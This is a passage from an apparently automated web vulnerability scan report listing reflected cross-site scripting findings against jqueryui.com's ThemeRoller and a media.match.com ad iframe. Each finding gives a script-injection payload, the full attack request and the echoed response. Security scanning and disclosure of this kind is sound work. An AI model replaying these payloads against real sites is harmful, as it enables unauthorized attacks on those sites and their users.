ve=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff87d4a"><script>alert(1)</script>7cbe5359106&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

4.83. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0c5a"><script>alert(1)</script>e6d1361b6b7 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0f0c5a"><script>alert(1)</script>e6d1361b6b7&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0f0c5a"><script>alert(1)</script>e6d1361b6b7&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI
...[SNIP]...

4.84. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2f3"><script>alert(1)</script>b0d24937c9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?fa2f3"><script>alert(1)</script>b0d24937c9e=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:24:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&fa2f3"><script>alert(1)</script>b0d24937c9e=1" type="text/css" media="all" />
...[SNIP]...

4.85. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ca4"><script>alert(1)</script>ef8babd57d1 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px31ca4"><script>alert(1)</script>ef8babd57d1&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px31ca4"><script>alert(1)</script>ef8babd57d1&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.86. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a2a1"><script>alert(1)</script>f8e2e66cbd8 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4a2a1"><script>alert(1)</script>f8e2e66cbd8&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4a2a1"><script>alert(1)</script>f8e2e66cbd8&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.87. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b66d"><script>alert(1)</script>623c2b48503 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305b66d"><script>alert(1)</script>623c2b48503&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305b66d"><script>alert(1)</script>623c2b48503&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

4.88. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40eb"><script>alert(1)</script>9eed84605e5 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30b40eb"><script>alert(1)</script>9eed84605e5&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30b40eb"><script>alert(1)</script>9eed84605e5&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.89. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e7eb"><script>alert(1)</script>0ffcdae2d95 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px9e7eb"><script>alert(1)</script>0ffcdae2d95&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px9e7eb"><script>alert(1)</script>0ffcdae2d95&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.90. http://media.match.com/cookE/geoip/iframe [@CPSC@ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /cookE/geoip/iframe

Issue detail

The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 143e5"><script>alert(1)</script>b0bf9d965be was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/143e5"><script>alert(1)</script>b0bf9d965be HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:37 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:37 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:37 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4987
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn
...[SNIP]...
?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/143e5"><script>alert(1)</script>b0bf9d965behttp://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119127_728x90">
...[SNIP]...

4.91. http://media.match.com/cookE/geoip/iframe [@CPSC@ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /cookE/geoip/iframe

Issue detail

The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84aee'-alert(1)-'c49b8f1b23a was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/84aee'-alert(1)-'c49b8f1b23a HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:38 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:38 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:38 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4928
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn
...[SNIP]...
14_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&ml_multiclick=clickTAG1&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/84aee'-alert(1)-'c49b8f1b23ahttp://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90');
clickTAGs += '&swfPATH=' + escape('http://media.match.com/xl/PROD/1777
...[SNIP]...

4.92. http://media.match.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /cookE/geoip/iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f6b"><script>alert(1)</script>f17304568b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&20f6b"><script>alert(1)</script>f17304568b2=1 HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:38 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:38 GMT; path=/; domain=.match.com
